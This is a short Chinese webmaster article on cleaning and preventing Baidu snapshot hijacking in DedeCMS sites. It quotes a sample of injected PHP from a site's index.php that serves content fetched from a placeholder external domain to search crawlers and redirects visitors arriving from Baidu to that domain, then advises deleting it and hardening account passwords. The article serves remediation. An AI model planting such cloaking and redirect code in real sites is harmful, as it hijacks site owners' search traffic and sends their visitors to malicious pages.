織夢(mèng)DedeCMS百度快照劫持注入代碼防范
時(shí)間: 2019-08-15 11:12
閱讀: 次
作者:素材無憂網(wǎng)
DedeCMS織夢(mèng)百度快照劫持注入代碼防范及修正,很多站長做站的過程中,都碰過百度快照被劫持等問題,明明已經(jīng)修復(fù)模板文件了,還是沒有更新回正常的快照,以織夢(mèng)系統(tǒng)為例,
往往根目錄/index.php也被植入惡意代碼,比如如下這種:
<?php
if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}
?>
單這段代碼就直接把搜索引擎蜘蛛搞暈,帶到別的惡意網(wǎng)址去。把其刪掉,如果在index.php里沒找到,但還是存在類似的問題,可以用dw全站搜索下。
特別注意:關(guān)于惡意劫持防范,空間,ftp賬號(hào),權(quán)限,后臺(tái)賬號(hào)之類都需要設(shè)置下,不能太過簡單。
版權(quán)聲明:
本站資源均來自互聯(lián)網(wǎng)或會(huì)員發(fā)布,如果侵犯了您的權(quán)益請(qǐng)與我們聯(lián)系,我們將在24小時(shí)內(nèi)刪除!謝謝!
轉(zhuǎn)載請(qǐng)注明:
織夢(mèng)DedeCMS百度快照劫持注入代碼防范
標(biāo)簽: